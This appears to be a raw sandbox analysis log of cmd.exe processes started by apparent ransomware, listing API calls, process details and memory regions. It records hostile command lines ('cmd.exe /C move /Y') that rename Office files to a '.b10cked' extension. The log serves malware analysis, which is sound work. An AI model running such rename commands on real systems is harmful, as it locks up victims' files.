(_String1="PROMPT", _String2="RANDOM") returned -2 [0153.175] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.175] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.176] GetEnvironmentStringsW () returned 0x1c2368* [0153.176] FreeEnvironmentStringsW (penv=0x1c2368) returned 1 [0153.176] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.176] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.176] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.176] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.176] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.176] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.176] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.176] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.176] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.176] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.176] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f4c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.176] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f4c8, lpFilePart=0x18f4c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4c4*="Desktop") returned 0x18 [0153.176] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.176] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0x1c09f8 [0153.176] FindClose (in: hFindFile=0x1c09f8 | out: hFindFile=0x1c09f8) returned 1 [0153.176] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0x1c09f8 [0153.176] FindClose (in: 
hFindFile=0x1c09f8 | out: hFindFile=0x1c09f8) returned 1 [0153.177] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0x1c09f8 [0153.177] FindClose (in: hFindFile=0x1c09f8 | out: hFindFile=0x1c09f8) returned 1 [0153.177] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.177] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.177] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.177] GetEnvironmentStringsW () returned 0x1c0218* [0153.177] FreeEnvironmentStringsW (penv=0x1c0218) returned 1 [0153.177] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.177] GetConsoleOutputCP () returned 0x1b5 [0153.178] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.178] GetUserDefaultLCID () returned 0x409 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f608, cchData=128 | out: lpLCData="0") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f608, cchData=128 | out: lpLCData="0") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f608, cchData=128 | out: lpLCData="1") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.179] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.179] GetConsoleTitleW (in: lpConsoleTitle=0x1b0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.180] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.180] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.180] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.180] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.181] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.181] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.181] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.181] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.181] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.181] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.181] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.184] GetConsoleTitleW (in: lpConsoleTitle=0x18f300, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.186] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.186] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.186] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.186] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.186] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.186] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.186] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.186] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.186] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.186] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.186] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.186] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.186] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.186] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0153.186] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.186] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.186] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.186] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.188] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f0bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f0b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f0b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.189] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.189] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0153.189] _wcsicmp 
(_String1="GRINTL~2.TRX", _String2="..") returned 57 [0153.189] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~2.trx")) returned 0x2020 [0153.190] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1c1f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.190] SetErrorMode (uMode=0x0) returned 0x0 [0153.190] SetErrorMode (uMode=0x1) returned 0x0 [0153.190] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18ea44, lpFilePart=0x18ea2c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", lpFilePart=0x18ea2c*="GRINTL~2.TRX") returned 0x3c [0153.190] SetErrorMode (uMode=0x0) returned 0x1 [0153.190] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.190] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0153.190] _wcsicmp (_String1="GRINTL~2.TRX", _String2="..") returned 57 [0153.190] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~2.trx")) returned 0x2020 [0153.190] SetErrorMode (uMode=0x0) returned 0x0 [0153.190] SetErrorMode (uMode=0x1) returned 0x0 [0153.190] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18eec0, lpFilePart=0x18ec58 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", lpFilePart=0x18ec58*="GRINTL~2.TRX") returned 0x3c [0153.190] SetErrorMode (uMode=0x0) returned 0x1 [0153.190] SetErrorMode (uMode=0x0) returned 0x0 [0153.190] SetErrorMode (uMode=0x1) returned 0x0 [0153.190] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f0c8, lpFilePart=0x18ec58 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x18ec58*="GRINTL32.REST.trx_dll.b10cked") returned 0x4d [0153.190] SetErrorMode (uMode=0x0) returned 0x1 [0153.190] SetLastError (dwErrCode=0x0) [0153.190] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll.b10cked")) returned 0xffffffff [0153.191] GetLastError () returned 0x2 [0153.191] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e5d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e5d4) returned 0x1c2138 [0153.191] FindNextFileW (in: hFindFile=0x1c2138, lpFindFileData=0x18e5d4 | out: lpFindFileData=0x18e5d4) returned 0 [0153.191] GetLastError () returned 0x12 [0153.191] FindClose (in: hFindFile=0x1c2138 | out: hFindFile=0x1c2138) returned 1 [0153.192] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1c1cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c1cc8) returned 0x1c2138 [0153.193] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0153.193] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e86c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0153.193] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll")) returned 0x2020 [0153.193] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.193] FindClose (in: hFindFile=0x1c2138 | out: hFindFile=0x1c2138) returned 1 [0153.194] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e820 | out: _Buffer=" 1") returned 9 [0153.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.194] GetFileType (hFile=0x7) returned 0x2 [0153.230] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.230] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e7ac | out: lpMode=0x18e7ac) returned 1 [0153.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e7e0 | out: lpConsoleScreenBufferInfo=0x18e7e0) returned 1 [0153.230] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.231] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e820 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.231] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x18e804, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e804*=0x1a) returned 1 [0153.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.231] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.231] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.231] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.231] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.231] SetConsoleInputExeNameW () returned 0x1 [0153.231] GetConsoleOutputCP () returned 0x1b5 [0153.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.232] exit (_Code=0) Process: id = "253" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20728 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20730 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20731 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20732 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20733 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20734 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20735 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 20736 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20798 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20799 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20800 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20801 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 20802 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 20803 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20804 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20805 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20806 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20807 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20808 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20809 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20810 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20811 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20812 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 20813 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20814 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20815 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20816 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 20817 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 20818 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 20819 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 20820 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 20821 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = 
